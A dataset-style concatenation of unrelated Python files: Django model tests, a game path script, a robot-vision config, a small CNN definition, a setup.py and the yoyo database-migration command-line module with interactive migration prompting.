        self.assertEqual(field_label, 'name')

    def test_location_friendly_name_label(self):
        name = Location.objects.get(pk=1)
        field_label = name._meta.get_field('friendly_name').verbose_name
        self.assertEqual(field_label, 'friendly name')

    def test_location_name_max_length(self):
        name = Location.objects.get(pk=1)
        max_length = name._meta.get_field('name').max_length
        self.assertEqual(max_length, 254)

    def test_location_friendly_name_max_length(self):
        friendly_name = Location.objects.get(pk=1)
        max_length = friendly_name._meta.get_field('friendly_name').max_length
        self.assertEqual(max_length, 254)

    def test_location_string_method(self):
        item = Location.objects.get(pk=1)
        expected_object_name = f'{item.name}'
        self.assertEqual(expected_object_name, str(item))

    # --- Product ----------------------------------------------------------

    def test_product_price_is_not_string(self):
        # Guards against price being declared as a CharField by mistake.
        price = Product.objects.get(pk=1)
        self.assertNotIsInstance(price.price, str)

    def test_product_string_method(self):
        # Product.__str__ is expected to return friendly_name, not name.
        item = Product.objects.get(pk=1)
        expected_object_name = f'{item.friendly_name}'
        self.assertEqual(expected_object_name, str(item))

    def test_product_friendly_name_max_length(self):
        friendly_name = Product.objects.get(pk=1)
        max_length = friendly_name._meta.get_field('friendly_name').max_length
        self.assertEqual(max_length, 254)
|
999,494 | 209759dfd3117cd9ac134de4a900cae1c97c102a | #!/usr/bin/env python3
import pathlib
import os

"""Resolve and display the game's resource directories."""

# The project root is two directory levels above this file.
rootpath = pathlib.Path(__file__).parents[1]

# Shared resource folder, then one subfolder per asset category.
libpath = os.path.join(rootpath, "src", "game", "lib", "res")
playerpath = os.path.join(libpath, "player")
buttonspath = os.path.join(libpath, "buttons")
enemypath = os.path.join(libpath, "enemy")

for _path in (libpath, playerpath, buttonspath, enemypath):
    print(_path)
|
999,495 | 70162cde07bf1724fde2baf5a0a4af73d2b18170 | config = {
'GOALIE_PARAMS': (57, 5, 9),
'OFFENSE_PARAMS': (61, -2, -2),
'PIXELS_PER_CM': 12.598,
'ROI': [[200, 80], [1004, 95], [990, 662], [199, 646]],
'BALL_THRESH': ((7, 0, 0), (61, 167, 255)),
'ROBOT_THRESH': ((150, 74, 37), (198, 255, 207)),
'HUMAN_THRESH': ((104, 175, 0), (128, 255, 255))
} |
999,496 | 9ccc2e90150a91651eda378384eb9a322b569a1d | from django.apps import AppConfig
class UsersConfig(AppConfig):
    """App configuration for the ``users`` Django app."""

    name = 'users'

    # Import the signal handlers declared in signals.py only once the app
    # registry is ready -- the Django convention for connecting signals
    # without import-time side effects.
    def ready(self):
        import users.signals
|
999,497 | 89da6b9be72cbbad275e83a9558c22d983b7748c | #!/usr/bin/python3
from __future__ import print_function
from main import run
from layers import *

# Three conv -> relu -> maxpool feature stages...
_feature_stages = [
    conv2D(3, 128, 3), relu(), max_pool_2d(2),
    conv2D(128, 128, 3), relu(), max_pool_2d(2),
    conv2D(128, 128, 3), relu(), max_pool_2d(2),
]
# ...followed by a flattening step and a batch-normed MLP classifier head.
_classifier_stages = [
    flatten(),
    xaffine(512, 512), bnorm(512, 0.1), relu(),
    xaffine(512, 512), bnorm(512, 0.1), relu(),
    xaffine(512, 10), relu(),
    softmax(),
]

network = compose(*(_feature_stages + _classifier_stages))

run(network, "mark2b")
|
999,498 | 58a330d87393999fdaad6db40cd973e8a79caed6 | from setuptools import setup
import shutil

# Runtime requirements are maintained one per line inside the package.
with open('usefulholidays/requirements.txt') as req_file:
    required = req_file.read().splitlines()

setup(
    name='usefulholidays',
    version='0.4',
    description='The disrupting package to check the school calendar :) ',
    url='https://github.com/WRPLA/usefulholidays',
    author='brios',
    license='T4T-Rios',
    packages=['usefulholidays'],
    package_data={'usefulholidays': ['*.db']},  # ship bundled holiday databases
    install_requires=required,
    zip_safe=False,
)
|
999,499 | 9f1bf4202b4f9f23530cd0d4686e484058c6c33b | # Copyright 2015 Oliver Cope
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import re
import warnings
from tabulate import tabulate
from yoyo import read_migrations, default_migration_table, ancestors, descendants
from yoyo.scripts.main import InvalidArgument, get_backend
from yoyo import utils
def install_argparsers(global_parser, subparsers):
    """Attach yoyo's subcommands to the top-level argument parser.

    Options shared by the migration commands (apply, showmigrations,
    rollback, reapply, mark, unmark) live on a common ``migration_parser``;
    ``break-lock`` takes only the database option.
    """
    migration_parser = argparse.ArgumentParser(add_help=False)
    migration_parser.add_argument(
        "sources", nargs="*", help="Source directory of migration scripts"
    )
    migration_parser.add_argument(
        "-l",
        "--limit",
        # Fix: without type=int the value arrived as a string, but it is
        # passed straight through as a numeric limit to
        # apply_migrations/rollback_migrations.
        type=int,
        default=None,
        help="Limit apply, rollback or reapply to N migrations."
    )
    migration_parser.add_argument(
        "-d",
        "--database",
        default=None,
        help="Database, eg 'sqlite:///path/to/sqlite.db' "
        "or 'postgresql://user@host/db'",
    )
    migration_parser.add_argument(
        "-m",
        "--match",
        help="Select migrations matching PATTERN (regular expression)",
        metavar="PATTERN",
    )
    migration_parser.add_argument(
        "-a",
        "--all",
        dest="all",
        action="store_true",
        help="Select all migrations, regardless of whether "
        "they have been previously applied",
    )
    migration_parser.add_argument(
        "-f",
        "--force",
        dest="force",
        action="store_true",
        help="Force apply/rollback of steps even if " "previous steps have failed",
    )
    migration_parser.add_argument(
        "-p",
        "--prompt-password",
        dest="prompt_password",
        action="store_true",
        help="Prompt for the database password",
    )
    migration_parser.add_argument(
        "--migration-table",
        dest="migration_table",
        action="store",
        default=default_migration_table,
        help="Name of table to use for storing " "migration metadata",
    )
    migration_parser.add_argument(
        "-r",
        "--revision",
        help="Apply/rollback migration with id " "REVISION",
        metavar="REVISION",
    )

    # Each subcommand dispatches to its handler via func/command_name.
    parser_apply = subparsers.add_parser(
        "apply", help="Apply migrations", parents=[global_parser, migration_parser]
    )
    parser_apply.set_defaults(func=apply, command_name="apply")
    # Renamed from the reused parser_apply local for clarity.
    parser_show = subparsers.add_parser(
        "showmigrations", help="Show migrations", parents=[global_parser, migration_parser]
    )
    parser_show.set_defaults(func=show_migrations, command_name="showmigrations")
    parser_rollback = subparsers.add_parser(
        "rollback",
        parents=[global_parser, migration_parser],
        help="Rollback migrations",
    )
    parser_rollback.set_defaults(func=rollback, command_name="rollback")
    parser_reapply = subparsers.add_parser(
        "reapply", parents=[global_parser, migration_parser], help="Reapply migrations"
    )
    parser_reapply.set_defaults(func=reapply, command_name="reapply")
    parser_mark = subparsers.add_parser(
        "mark",
        parents=[global_parser, migration_parser],
        help="Mark migrations as applied, without running them",
    )
    parser_mark.set_defaults(func=mark, command_name="mark")
    parser_unmark = subparsers.add_parser(
        "unmark",
        parents=[global_parser, migration_parser],
        help="Unmark applied migrations, without rolling them back",
    )
    parser_unmark.set_defaults(func=unmark, command_name="unmark")
    parser_break_lock = subparsers.add_parser(
        "break-lock", parents=[global_parser], help="Break migration locks"
    )
    parser_break_lock.set_defaults(func=break_lock, command_name="break-lock")
    parser_break_lock.add_argument(
        "-d",
        "--database",
        default=None,
        help="Database, eg 'sqlite:///path/to/sqlite.db' "
        "or 'postgresql://user@host/db'",
    )
)
def get_migrations(args, backend):
    """Build the migration collection selected by the parsed CLI options.

    Filters are applied in order: source directories, ``--match`` pattern,
    applied/unapplied status (unless ``--all``), ``--revision`` plus its
    dependency closure, then interactive prompting / batch-mode limits and
    a final confirmation.  Raises InvalidArgument on bad selections.
    """
    sources = args.sources
    dburi = args.database
    if not sources:
        raise InvalidArgument("Please specify the migration source directory")
    migrations = read_migrations(*sources)
    if args.match:
        migrations = migrations.filter(
            lambda m: re.search(args.match, m.id) is not None
        )
    # Unless --all was given, narrow to migrations whose status makes the
    # requested command meaningful (unapplied for apply/mark, applied for
    # rollback/reapply/unmark).
    if not args.all:
        if args.func in {apply, mark}:
            migrations = backend.to_apply(migrations)
        elif args.func in {rollback, reapply, unmark}:
            migrations = backend.to_rollback(migrations)
        elif args.func == show_migrations:
            # showmigrations reports status for everything and skips the
            # remaining selection logic entirely.
            return backend.get_migrations_with_applied_status(migrations)
    if args.revision:
        # --revision matches by substring and must resolve to exactly one id.
        targets = [m for m in migrations if args.revision in m.id]
        if len(targets) == 0:
            raise InvalidArgument(
                "'{}' doesn't match any revisions.".format(args.revision)
            )
        if len(targets) > 1:
            raise InvalidArgument(
                "'{}' matches multiple revisions. "
                "Please specify one of {}.".format(
                    args.revision, ", ".join(m.id for m in targets)
                )
            )
        target = targets[0]
        # apply: apply target and all its dependencies
        if args.func in {mark, apply}:
            deps = ancestors(target, migrations)
            target_plus_deps = deps | {target}
            migrations = migrations.filter(lambda m: m in target_plus_deps)
        # rollback/reapply: rollback target and everything that depends on it
        else:
            deps = descendants(target, migrations)
            target_plus_deps = deps | {target}
            migrations = migrations.filter(lambda m: m in target_plus_deps)
    if not args.batch_mode and not args.revision:
        migrations = prompt_migrations(backend, migrations, args.command_name)
    # Safety net: a batch-mode rollback without an explicit selection is
    # truncated to a single migration.
    if args.batch_mode and not args.revision and not args.all and args.func is rollback:
        if len(migrations) > 1:
            warnings.warn(
                "Only rolling back a single migration."
                "To roll back multiple migrations, "
                "either use interactive mode or use "
                "--revision or --all"
            )
            migrations = migrations[:1]
    # Interactive final confirmation; declining returns an empty collection.
    if not args.batch_mode and migrations:
        print("")
        print(
            "Selected", utils.plural(len(migrations), "%d migration:", "%d migrations:")
        )
        for m in migrations:
            print("  [{m.id}]".format(m=m))
        prompt = "{} {} to {}".format(
            args.command_name.title(),
            utils.plural(len(migrations), "this migration", "these %d migrations"),
            dburi,
        )
        if not utils.confirm(prompt, default="y"):
            return migrations.replace([])
    return migrations
def apply(args, config):
    """Apply the selected migrations to the target database."""
    backend = get_backend(args, config)
    with backend.lock():
        backend.apply_migrations(
            get_migrations(args, backend), args.force, limit=args.limit
        )
def show_migrations(args, config):
    """Print a table of migrations and whether each has been applied."""
    backend = get_backend(args, config)
    with backend.lock():
        rows = []
        for m in get_migrations(args, backend):
            # Green "Yes" / red "No" via ANSI colour escapes.
            status = '\033[92m Yes \033[0m' if m.applied else '\033[91m No \033[0m'
            rows.append((m.id, status))
        print(tabulate(rows, headers=['Migration', 'Applied']))
def reapply(args, config):
    """Roll back the selected migrations, then apply them afresh."""
    backend = get_backend(args, config)
    with backend.lock():
        selected = get_migrations(args, backend)
        backend.rollback_migrations(selected, args.force, limit=args.limit)
        # After rolling back, re-select what is now unapplied and apply it.
        backend.apply_migrations(
            backend.to_apply(selected), args.force, limit=args.limit
        )
def rollback(args, config):
    """Roll back the selected migrations."""
    backend = get_backend(args, config)
    with backend.lock():
        backend.rollback_migrations(
            get_migrations(args, backend), args.force, limit=args.limit
        )
def mark(args, config):
    """Record the selected migrations as applied, without running them."""
    backend = get_backend(args, config)
    with backend.lock():
        backend.mark_migrations(get_migrations(args, backend))
def unmark(args, config):
    """Clear the applied record for the selected migrations, without rolling them back."""
    backend = get_backend(args, config)
    with backend.lock():
        backend.unmark_migrations(get_migrations(args, backend))
def break_lock(args, config):
    """Forcibly release any held migration lock on the target database."""
    get_backend(args, config).break_lock()
def prompt_migrations(backend, migrations, direction):
    """
    Iterate through the list of migrations and prompt the user to
    apply/rollback each. Return a list of user selected migrations.

    direction
        one of 'apply' or 'rollback'
    """

    class prompted_migration(object):
        # Pairs a migration with the user's y/n choice (None = not yet asked).
        def __init__(self, migration, default=None):
            super(prompted_migration, self).__init__()
            self.migration = migration
            self.choice = default

    to_prompt = [prompted_migration(m) for m in migrations]
    position = 0
    while position < len(to_prompt):
        mig = to_prompt[position]
        choice = mig.choice
        if choice is None:
            # Default answer: apply what isn't applied, roll back what is.
            is_applied = backend.is_applied(mig.migration)
            if direction == "apply":
                choice = "n" if is_applied else "y"
            else:
                choice = "y" if is_applied else "n"
        # The default option is shown uppercased among the choices.
        options = "".join(o.upper() if o == choice else o.lower() for o in "ynvdaqjk?")
        print("")
        print("[%s]" % (mig.migration.id,))
        response = utils.prompt("Shall I %s this migration?" % (direction,), options)
        if response == "?":
            print("")
            print("y: %s this migration" % (direction,))
            print("n: don't %s it" % (direction,))
            print("")
            print("v: view this migration in full")
            print("")
            print(
                "d: %s the selected migrations, skipping any remaining" % (direction,)
            )
            print("a: %s all the remaining migrations" % (direction,))
            print("q: cancel without making any changes")
            print("")
            print("j: skip to next migration")
            print("k: back up to previous migration")
            print("")
            print("?: show this help")
            continue
        if response in "yn":
            mig.choice = response
            position += 1
            continue
        if response == "v":
            print(mig.migration.source)
            continue
        if response == "j":
            # Skip forward without recording a choice.
            position = min(len(to_prompt), position + 1)
            continue
        if response == "k":
            # No continue here: "k" matches none of the branches below, so
            # control falls through harmlessly to the next loop iteration.
            position = max(0, position - 1)
        if response == "d":
            # Done: keep choices made so far, leave the rest unselected.
            break
        if response == "a":
            for mig in to_prompt[position:]:
                mig.choice = "y"
            break
        if response == "q":
            for mig in to_prompt:
                mig.choice = "n"
            break
    return migrations.replace(m.migration for m in to_prompt if m.choice == "y")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.